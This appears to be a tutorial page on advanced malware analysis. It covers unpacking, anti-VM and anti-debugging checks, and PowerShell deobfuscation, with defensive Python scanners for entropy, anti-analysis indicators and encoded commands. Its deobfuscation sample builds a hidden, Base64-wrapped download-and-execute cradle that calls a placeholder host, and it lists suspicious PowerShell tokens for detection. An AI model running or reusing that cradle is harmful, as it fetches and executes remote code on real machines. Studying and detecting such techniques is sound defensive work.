💀 Expert

Advanced Techniques

Unpacking Malware

Malware is often "packed" (compressed or encrypted) to hide its real code from static analysis. The packer stub runs first, decompresses or decrypts the payload into memory, and then transfers execution to it.

Manual Unpacking Steps

  1. Find the OEP (Original Entry Point): The address where the original, unpacked program begins executing. Look for "tail jumps" (e.g., `jmp eax` or a long jump into a different section) at the end of the packer stub.
  2. Dump Memory: Once the debugger is paused at the OEP, dump the process image from memory to disk. Tools: Scylla, x64dbg (Scylla plugin).
  3. Fix IAT: The Import Address Table is usually unusable in the dump, because the packer resolved imports itself at run time. Use Scylla to rebuild it.
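Before stepping through a sample in a debugger, it helps to confirm that it is packed at all. The script below is an added example (it is not from this page or any tool it names): it computes per-window Shannon entropy over a byte buffer and reports contiguous high-entropy regions, which is the classic static indicator of a compressed or encrypted payload sitting behind a small stub. The STUB, PAYLOAD and SAMPLE values are constructed test data, not a real binary; pass a file path on the command line to run it on a real sample.

```python
import math
import random
import sys
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of `data` in bits per byte: 0.0 for a constant buffer, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def entropy_profile(data: bytes, window: int = 256) -> list:
    """Entropy per fixed-size window, as (offset, entropy) pairs."""
    return [(off, shannon_entropy(data[off:off + window]))
            for off in range(0, len(data), window)]

def packed_regions(data: bytes, window: int = 256, threshold: float = 7.0) -> list:
    """Contiguous (start, end) byte ranges whose windows all meet the entropy threshold.
    Compressed or encrypted payloads sit close to 8 bits/byte; ordinary x86 code and
    padding sit well below 7, so a threshold near 7 separates the two in practice."""
    regions, start = [], None
    for off, ent in entropy_profile(data, window):
        if ent >= threshold:
            if start is None:
                start = off
        elif start is not None:
            regions.append((start, off))
            start = None
    if start is not None:
        regions.append((start, len(data)))
    return regions

# Constructed sample (not a real binary): a low-entropy "stub" of NOP sleds, prologue bytes
# and zero padding, followed by a high-entropy "packed payload" built from four byte
# permutations (each 256-byte window holds every byte value once, so its entropy is 8.0).
STUB = b"\x90" * 64 + b"\x55\x8b\xec" * 64 + b"\x00" * 256   # 512 bytes
_rng = random.Random(1337)                                     # fixed seed: deterministic sample
PAYLOAD = b""
for _ in range(4):
    _block = list(range(256))
    _rng.shuffle(_block)
    PAYLOAD += bytes(_block)
SAMPLE = STUB + PAYLOAD                                        # 1536 bytes

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print(f"overall entropy: {shannon_entropy(blob):.2f} bits/byte")
    for start, end in packed_regions(blob):
        print(f"high-entropy region 0x{start:x}-0x{end:x} ({end - start} bytes)")
```

On the constructed sample the first two windows score 2.0 and 0.0 bits/byte and the payload windows score 8.0, so the only reported region is 0x200-0x600. On a real PE you would normally run this per section rather than over the whole file, and compare the result with the section names and sizes: a tiny `.text` next to a large near-8.0 section is the typical packed layout.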

Anti-Analysis Techniques

Malware tries to detect whether it is being analyzed and changes its behaviour if it thinks it is.

Anti-VM

  • CPUID: Executing the CPUID instruction and checking its results for hypervisor signatures.
  • MAC Address: Checking the network adapter's MAC for VMware/VirtualBox OUI prefixes.
  • Registry Keys: Checking for registry keys left by VM guest tools.

Anti-Debugging

  • IsDebuggerPresent(): Windows API call that returns non-zero when a debugger is attached. (Bypass: patch the return value in EAX to 0.)
  • PEB.BeingDebugged: Reading the BeingDebugged flag directly from the Process Environment Block instead of calling the API (the API reads the same flag).
  • Timing Checks: Using `rdtsc` to measure execution time (single-stepping and breakpoints make code run far slower than normal).
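All of the anti-VM and anti-debugging checks above leave traces in the binary: API names in the import table, vendor strings, and a handful of characteristic opcode sequences. The scanner below is an added example (not from this page or from any named tool) that searches a byte buffer, typically the unpacked dump from the previous section, for those traces and produces a weighted triage score. The INDICATORS table and the SAMPLE bytes are constructed for this example; the PEB-read opcode patterns are the standard `mov eax, fs:[30h]` (x86) and `mov rax, gs:[60h]` (x64) encodings.

```python
import re
import sys

# Indicator table: (category, label, byte pattern, weight). The weights are a rough triage
# score, not a verdict: two-byte opcodes such as CPUID/RDTSC also occur in benign code and in
# non-code data, so they count far less than an imported anti-debug API name.
INDICATORS = [
    ("anti-vm",    "VMware string",                     b"VMware",                                2),
    ("anti-vm",    "VirtualBox string",                 b"VirtualBox",                            2),
    ("anti-vm",    "VBox guest additions string",       b"VBoxGuest",                             2),
    ("anti-vm",    "VMware OUI 00:0C:29 (text)",        b"00:0C:29",                              2),
    ("anti-vm",    "VMware OUI 00:50:56 (text)",        b"00:50:56",                              2),
    ("anti-vm",    "VirtualBox OUI 08:00:27 (text)",    b"08:00:27",                              2),
    ("anti-vm",    "CPUID opcode (0F A2)",              b"\x0f\xa2",                              1),
    ("anti-debug", "IsDebuggerPresent import",          b"IsDebuggerPresent",                     3),
    ("anti-debug", "CheckRemoteDebuggerPresent import", b"CheckRemoteDebuggerPresent",            3),
    ("anti-debug", "PEB read via fs:[30h] (x86)",       b"\x64\xa1\x30\x00\x00\x00",              2),
    ("anti-debug", "PEB read via gs:[60h] (x64)",       b"\x65\x48\x8b\x04\x25\x60\x00\x00\x00",  2),
    ("anti-debug", "RDTSC opcode (0F 31)",              b"\x0f\x31",                              1),
]

def _variants(pattern: bytes):
    """Yield (encoding, needle) for each form to search: the bytes as given, plus a UTF-16LE
    form for printable text, because Windows binaries store many strings as wide characters."""
    yield "ascii", pattern
    if all(0x20 <= b < 0x7f for b in pattern):
        yield "utf-16le", pattern.decode("ascii").encode("utf-16-le")

def scan(data: bytes) -> list:
    """Return one hit dict per indicator occurrence, ordered by file offset."""
    hits = []
    for category, label, pattern, weight in INDICATORS:
        for encoding, needle in _variants(pattern):
            for m in re.finditer(re.escape(needle), data):
                hits.append({"category": category, "label": label, "encoding": encoding,
                             "offset": m.start(), "weight": weight})
    return sorted(hits, key=lambda h: h["offset"])

def score(hits: list) -> int:
    """Sum of hit weights; a quick way to rank samples for manual review."""
    return sum(h["weight"] for h in hits)

def by_category(hits: list) -> dict:
    """Group hit labels by category, preserving offset order."""
    out = {}
    for h in hits:
        out.setdefault(h["category"], []).append(h["label"])
    return out

# Constructed sample: a fake DOS header, a few anti-analysis opcode sequences, an ASCII
# import name and a wide (UTF-16LE) vendor string. Not a real executable.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"\x64\xa1\x30\x00\x00\x00"          # mov eax, fs:[30h]  (x86 PEB fetch)
    + b"\x0f\x31"                          # rdtsc
    + b"\x0f\xa2"                          # cpuid
    + b"IsDebuggerPresent\x00"             # import name as it appears in the IAT strings
    + "VMware".encode("utf-16-le")         # wide string, as in registry/device paths
    + b"\x00" * 32
)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    found = scan(blob)
    for h in found:
        print(f"0x{h['offset']:06x}  {h['category']:<10} {h['label']} [{h['encoding']}]")
    print(f"score: {score(found)}  categories: {by_category(found)}")
```

Opcode hits are only meaningful inside executable sections, so on a real sample restrict them to `.text` (or to the dumped image's code ranges) and treat the string and import hits as the primary evidence; a benign installer that mentions VMware is common, while a program that both imports IsDebuggerPresent and reads the PEB flag by hand rarely is.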

Deobfuscation

Scripts (PowerShell, JavaScript) are often heavily obfuscated, frequently in several nested layers of encoding.

  • CyberChef: The "Swiss Army Knife" for decoding Base64, XOR, etc.
  • Box-js: Emulator for analyzing malicious JavaScript.
  • PowerShell Logging: Enable Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) to record the deobfuscated script blocks as PowerShell executes them.
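Script Block Logging gives you the decoded script only on a host where it ran. When all you have is a command line from a process-creation event, you can peel the common layers offline: `-EncodedCommand` is Base64 of UTF-16LE text, and the decoded script often contains a further `[Convert]::FromBase64String('...')` layer. The script below is an added example (not from this page, CyberChef or Box-js) that does exactly that and flags suspicious tokens across all layers. The SAMPLE_CMDLINE, its nested payload and the host example.invalid are constructed for this example.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the usual spellings.
ENC_RE = re.compile(r"-e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
B64_CALL_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)

SUSPICIOUS = ["Invoke-Expression", "IEX", "DownloadString", "FromBase64String",
              "-w hidden", "-nop", "Net.WebClient"]

def decode_b64_text(b64: str) -> str:
    """Base64-decode and pick the text encoding: -EncodedCommand payloads are UTF-16LE
    (every other byte is NUL for ASCII text); nested FromBase64String blobs are usually UTF-8."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # tolerate stripped padding
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")

def peel(command_line: str, max_layers: int = 5) -> list:
    """Return the decoded script for each layer, outermost first; [] if nothing is encoded."""
    layers = []
    m = ENC_RE.search(command_line)
    if not m:
        return layers
    current = decode_b64_text(m.group(1))
    layers.append(current)
    for _ in range(max_layers - 1):            # bounded so a malformed blob cannot loop forever
        inner = B64_CALL_RE.search(current)
        if not inner:
            break
        current = decode_b64_text(inner.group(1))
        layers.append(current)
    return layers

def flags(command_line: str, layers: list) -> list:
    """Suspicious tokens present anywhere in the command line or its decoded layers."""
    text = (command_line + "\n" + "\n".join(layers)).lower()
    return [tok for tok in SUSPICIOUS if tok.lower() in text]

# Constructed sample: a two-layer encoded command. The inner script stages a download from a
# reserved example host; the outer script unwraps it with FromBase64String and Invoke-Expression.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
OUTER = ("$s=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
         + base64.b64encode(INNER.encode("utf-8")).decode("ascii")
         + "'));Invoke-Expression $s")
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(OUTER.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    decoded = peel(SAMPLE_CMDLINE)
    for depth, script in enumerate(decoded):
        print(f"--- layer {depth} ---\n{script}")
    print("flags:", flags(SAMPLE_CMDLINE, decoded))
```

This only handles Base64 wrapping. String concatenation, format operators, character-code arithmetic and compressed (`IO.Compression`) stages need either more decoding steps or, more reliably, the 4104 events, which log the script after PowerShell has resolved all of that itself; the two approaches complement each other, and a decoded layer from this script can be compared against the logged script block to confirm nothing was missed.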